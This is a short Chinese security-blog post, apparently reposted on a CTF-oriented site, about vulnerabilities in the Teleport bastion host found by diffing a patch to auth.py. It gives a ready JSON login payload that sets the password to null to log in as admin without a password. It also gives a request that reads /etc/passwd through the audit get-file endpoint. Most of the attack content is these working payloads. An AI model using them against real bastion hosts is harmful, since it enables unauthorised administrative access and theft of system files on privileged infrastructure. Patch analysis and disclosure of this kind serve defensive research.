CTF导航 CTF导航

teleport 堡垒机任意用户登录漏洞

渗透技巧 2年前 (2022) admin
1,457 0 0

一、任意用户登录

拿到更新包进行对比首先更新包更新了两个文件

teleport 堡垒机任意用户登录漏洞

对比auth.py

teleport 堡垒机任意用户登录漏洞

两个地方。一个是elif 改成了if 然后是检测了密码是否存在。那么跟进去代码看看login 的逻辑

teleport 堡垒机任意用户登录漏洞

只要password 为None 那么就可以跳过密码验证。

那么怎么让password 为None 那么就直接用 json.dumps

teleport 堡垒机任意用户登录漏洞

那么pyaload 如下:

{
    "type":2,
    "username":"admin",
    "password":null,
    "captcha":"rhcl",
    "oath":"",
    "remember":false
}

二、任意文件读取

teleport 堡垒机任意用户登录漏洞 
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0

还有一些其他的漏洞,在代码中emmm

原文始发于print(“”):teleport 堡垒机任意用户登录漏洞

版权声明:admin 发表于 2022年10月3日 上午11:44。
转载请注明:teleport 堡垒机任意用户登录漏洞 | CTF导航

相关文章

CVE-2021-40449(UAF)学习
admin
859
Google WebP图像编解码库漏洞分析(CVE-2023-4863)
admin
271
内存Dump数据库密码的补充
admin
936
深入剖析Java内存马: Tomcat下的Servlet、Filter与Listener攻击技术
admin
54
每日安全动态推送(03-08)
admin
781
如何用 FTP 被动模式打穿内网
admin
1,401

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0